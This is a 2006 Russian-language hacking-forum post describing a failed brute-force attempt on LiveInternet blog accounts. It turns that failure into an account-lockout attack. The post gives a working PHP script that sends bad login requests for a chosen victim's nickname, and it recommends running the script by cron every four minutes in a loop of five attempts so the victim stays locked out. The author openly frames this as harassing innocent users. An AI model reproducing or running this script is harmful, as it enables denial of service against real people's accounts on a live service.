| Talisman |
17.09.2006 18:42 |
дизаблим юзеров лайвинтернета или неудавшийся брут акков
.:: Дизабл юзеров лайвинтернета или неудавшийся брут акков ::.
В письме, приходящим после регистрации на проекте приходит интересный код:
Цитата:
Для входа свой дневник в качестве его хозяина нажмите на ссылку
http://www.liveinternet.ru/journal_login.php?nick=ЛОГИН&password=ПАРОЛЬ
|
т.е. скрипт ловит параметры и гетом.
Но после 5 попыток в тячении 5-ти минут нас обламывают:
Цитата:
Внимание!
За 5 минут вы более 5 раз авторизовались неверно. Очередная попытка авторизации будет вам доступна через 296 секунд
|
хм... обыдно :(
смена айпи не помогла - нас продолжают посылать лесом :( брут не получился, но зато получился следующий пшп-код:
PHP код:
<?
set_time_limit(0);
Error_Reporting(E_ALL & ~E_NOTICE);
$request = "GET /journal_login.php?nick=Жертва&password=Лажа HTTP/1.1\r\n";
$request .= "Host: www.liveinternet.ru \r\n";
$request .= "User-Agent: Opera 7.50";
$request .= "Connection: close\r\n";
$request .= "Referer: http://liveinternet.ru/ \r\n\r\n";
$fp = fsockopen('www.liveinternet.ru','80', $errno, $errstr, 30);
if (!$fp)
{
echo "$errstr ($errno)<br />\n";
}
else
{
fwrite($fp, $request);
}
echo 'done )';
?>
теперь никто не мешает натравить на скрипт крон, чтобы запускать его каждые 4 минуты (меньше чем 290 секунд, на которые нас любезно посылают), добавить цикл, чтобы скрипт отправлял 5 неверных попыток и давить ни в чем не повинных юзеров ) |
